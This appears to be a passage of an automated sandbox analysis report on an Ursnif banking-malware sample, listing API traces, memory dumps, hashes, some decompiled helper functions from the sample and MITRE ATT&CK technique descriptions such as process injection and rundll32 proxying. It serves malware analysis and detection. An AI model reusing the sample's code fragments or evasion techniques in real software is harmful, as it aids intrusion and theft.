Sleep.KERNEL32(0000000A,?,?,030855D3,?,?,?,?,?,03086BD8,?,00000001), ref: 030850F2
HeapFree.KERNEL32(00000000,?,?,?,030855D3,?,?,?,?,?,03086BD8,?,00000001), ref: 03085120
RtlLeaveCriticalSection.NTDLL(05BB95F0), ref: 03085135

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: dce5f1a8fb5bc5c1d7a86f7eaf6e030195b8113e943594f5cb3cd9e4265fcfcc
Instruction ID: c74b9e961405215873dbaf35feb7859ecbec6aa0d980997fbab3a319848b4a84
Opcode Fuzzy Hash: dce5f1a8fb5bc5c1d7a86f7eaf6e030195b8113e943594f5cb3cd9e4265fcfcc
Instruction Fuzzy Hash: 55F07AB4302241DFEB14FB28D859F2577E5AB49701B044415FD96D7754C738A800DE25

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D8BC5, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1D8FCA
_free.LIBCMT ref: 6E1D901F

Strings

-, xrefs: 6E1D8E6D

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free
String ID: -
API String ID: 269201875-2547889144
Opcode ID: 41101eb42ef822f191d93fa66e63e398c4abbff3032988c7ba67806419e67b8d
Instruction ID: ae8a7e925d162a25b730e965872f819d2ea2e1437561eb65ac13080433573e3a
Opcode Fuzzy Hash: 41101eb42ef822f191d93fa66e63e398c4abbff3032988c7ba67806419e67b8d
Instruction Fuzzy Hash: 43C1F97190021A9BDB64DFE4CC50BEEB3B9FF25708F2054AAD805D7184EB319AC9EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1BFA2A, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 274COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 6E1BFB82

Strings

+, xrefs: 6E1BFAD8
-, xrefs: 6E1BFACB

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: e4ecf5e4f62a9fa5bff1bc43e37526cd573115b7161018b485ecbb65d1732e6d
Instruction ID: c2411267401f2593ef3fa13184b2a3ad8f0b265d063acf47180e1a8dbe0539c8
Opcode Fuzzy Hash: e4ecf5e4f62a9fa5bff1bc43e37526cd573115b7161018b485ecbb65d1732e6d
Instruction Fuzzy Hash: FF91E5399401199ECB00CEF9CCA0ADDBB75FF5A324F74861AE874AB284D73499C6E750

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C02DE, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 274COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 6E1C0436

Strings

+, xrefs: 6E1C038C
-, xrefs: 6E1C037F

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 5698b121c01f62f030d8240604d9e7f15f5b34697c1c71bc998bd1dead7db752
Instruction ID: 7ca323f905ba7b84f8c8e9a877a9839946ebc1cd370cc3acf2224340fbad32f7
Opcode Fuzzy Hash: 5698b121c01f62f030d8240604d9e7f15f5b34697c1c71bc998bd1dead7db752
Instruction Fuzzy Hash: 9591C2B0D442199FCF00CFE9C8506DE7BB5AF76B24F254619E464E7284E73899C2EB12

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA066, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 6E1CA1D1

Strings

-, xrefs: 6E1CA0FF
+, xrefs: 6E1CA10C

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: d47bfdae694c3e1c58a06dceb2a2d82ef8e2cd1ccf0e31635b789d214d18a3b2
Instruction ID: 04d3e9a7c8c32aab4381006adda036104e921e6790095c76f7df7f1cab65c758
Opcode Fuzzy Hash: d47bfdae694c3e1c58a06dceb2a2d82ef8e2cd1ccf0e31635b789d214d18a3b2
Instruction Fuzzy Hash: 1F9117309441199EDF02CEE9C8606DDBBB4EF72B20F144646E876D7290D3398981EB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CB223, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E1CB266, 6E1CB26D, 6E1CB2A3

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: e2dd79b8fff55152d2ad9f1c11a56b141fad5b508c46d50dabb2e044124758d4
Instruction ID: 230bc36a2ac5a7d5b9eaa593443092ec79b1b5f270539c0df7f0de769d875c63
Opcode Fuzzy Hash: e2dd79b8fff55152d2ad9f1c11a56b141fad5b508c46d50dabb2e044124758d4
Instruction Fuzzy Hash: F941A571A18614AFDB11DFD9C884D9EBBBDFFA5B00B20086AE400D7204E7749A85EB51

Uniqueness

Uniqueness Score: -1.00%

Function 03083D98, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E03083D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E03086837(_t2);
				if(_t34 != 0) {
					_t30 = E03086837(_t28);
					if(_t30 == 0) {
						E030850CA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E030877DD(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E030877DD(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x03083d98
0x03083da2
0x03083da4
0x03083daa
0x03083daa
0x03083db3
0x03083db7
0x03083dc3
0x03083dc7
0x03083e3b
0x03083dc9
0x03083dc9
0x03083dcd
0x03083dd4
0x03083dd7
0x03083df1
0x03083de0
0x03083de0
0x03083de4
0x03083de7
0x03083dec
0x03083dec
0x03083df6
0x03083e1e
0x03083e24
0x03083e27
0x03083df8
0x03083dfa
0x03083e02
0x03083e0d
0x03083e12
0x03083e12
0x03083e2e
0x03083e35
0x03083e36
0x03083e36
0x03083dc7
0x03083e46

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,03083CEE,00000000,00000000,00000000,05BB9698,?,?,0308106E,?,05BB9698), ref: 03083DA4

Part of subcall function 03086837: RtlAllocateHeap.NTDLL(00000000,00000000,03084197), ref: 03086843

Part of subcall function 030877DD: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,03083DD2,00000000,00000001,00000001,?,?,03083CEE,00000000,00000000,00000000,05BB9698), ref: 030877EB
Part of subcall function 030877DD: StrChrA.SHLWAPI(?,0000003F,?,?,03083CEE,00000000,00000000,00000000,05BB9698,?,?,0308106E,?,05BB9698,0000EA60,?), ref: 030877F5

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,03083CEE,00000000,00000000,00000000,05BB9698,?,?,0308106E), ref: 03083E02
lstrcpy.KERNEL32(00000000,00000000), ref: 03083E12
lstrcpy.KERNEL32(00000000,00000000), ref: 03083E1E

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: c1277f623098b351bbf7959df632b5668652dc6dd1d6ac72c20f8dbb7e89ae58
Instruction ID: f9c7efcc25b95d3110412d6f846a9c7ec00eece381a48c5fd556d120fb73d79c
Opcode Fuzzy Hash: c1277f623098b351bbf7959df632b5668652dc6dd1d6ac72c20f8dbb7e89ae58
Instruction Fuzzy Hash: B321C07A406355EFCB12FF64C884AAFBFE89F86A44B054090F9899F201D735D900CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03085D37, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03085D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E03086837(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x03085d4c
0x03085d50
0x03085d5a
0x03085d61
0x03085d64
0x03085d66
0x03085d6e
0x03085d73
0x03085d81
0x03085d86
0x03085d90

APIs

lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,05BB92FC,?,03081B37,004F0053,05BB92FC,?,?,?,?,?,?,030820B0), ref: 03085D47
lstrlenW.KERNEL32(03081B37,?,03081B37,004F0053,05BB92FC,?,?,?,?,?,?,030820B0), ref: 03085D4E

Part of subcall function 03086837: RtlAllocateHeap.NTDLL(00000000,00000000,03084197), ref: 03086843

memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,03081B37,004F0053,05BB92FC,?,?,?,?,?,?,030820B0), ref: 03085D6E
memcpy.NTDLL(74B069A0,03081B37,00000002,00000000,004F0053,74B069A0,?,?,03081B37,004F0053,05BB92FC), ref: 03085D81

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 787f7c74f54b2ec70dae744eaa25cadccb2bc6ba5917adae5cadbd0792133464
Instruction ID: 418c3f8bb05443a2745273bb0a72eed025a4abbdc2cc931d4a56febf836da69f
Opcode Fuzzy Hash: 787f7c74f54b2ec70dae744eaa25cadccb2bc6ba5917adae5cadbd0792133464
Instruction Fuzzy Hash: FAF04F76901218BFCF11EFA8CC84CDE7BACEF492547054462FE08DB201E735EA148BA0

Uniqueness

Uniqueness Score: -1.00%

Function 030821C1, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05BB87FA,00000000,00000000,00000000,03087100,00000000), ref: 030821D1
lstrlen.KERNEL32(?), ref: 030821D9

Part of subcall function 03086837: RtlAllocateHeap.NTDLL(00000000,00000000,03084197), ref: 03086843

lstrcpy.KERNEL32(00000000,05BB87FA), ref: 030821ED
lstrcat.KERNEL32(00000000,?), ref: 030821F8

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: f8e4819b4d92f75e11ca60f1f04fc27b3725c7424e945a740be5b9872a80b54c
Instruction ID: 15cf608eaa9ef9be14dec78842573ff54eb9b89fdf0e9d2a1fe119afb331b0ed
Opcode Fuzzy Hash: f8e4819b4d92f75e11ca60f1f04fc27b3725c7424e945a740be5b9872a80b54c
Instruction Fuzzy Hash: 59E09273902225AB8711BBE89C48CAFBBACEF996113090816FB40D3204CB28C805DFA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report HP7cjYBnlS

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Function 6E1B1144, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 6E1B1B9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 6E1B1E8A, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Function 6E1B1F7C, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 6E1B1EC7, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 6E1B1C7D, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Function 6E1B1060, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 6E1B1DAE, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 6E1B13D1, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 6E1B18AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Function 6E1B20CE, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 6E1B126D, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 6E1B14E8, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Function 6E1B1ADB, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Function 6E1B1444, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Function 6E1B1F10, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Function 6E1B2485, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON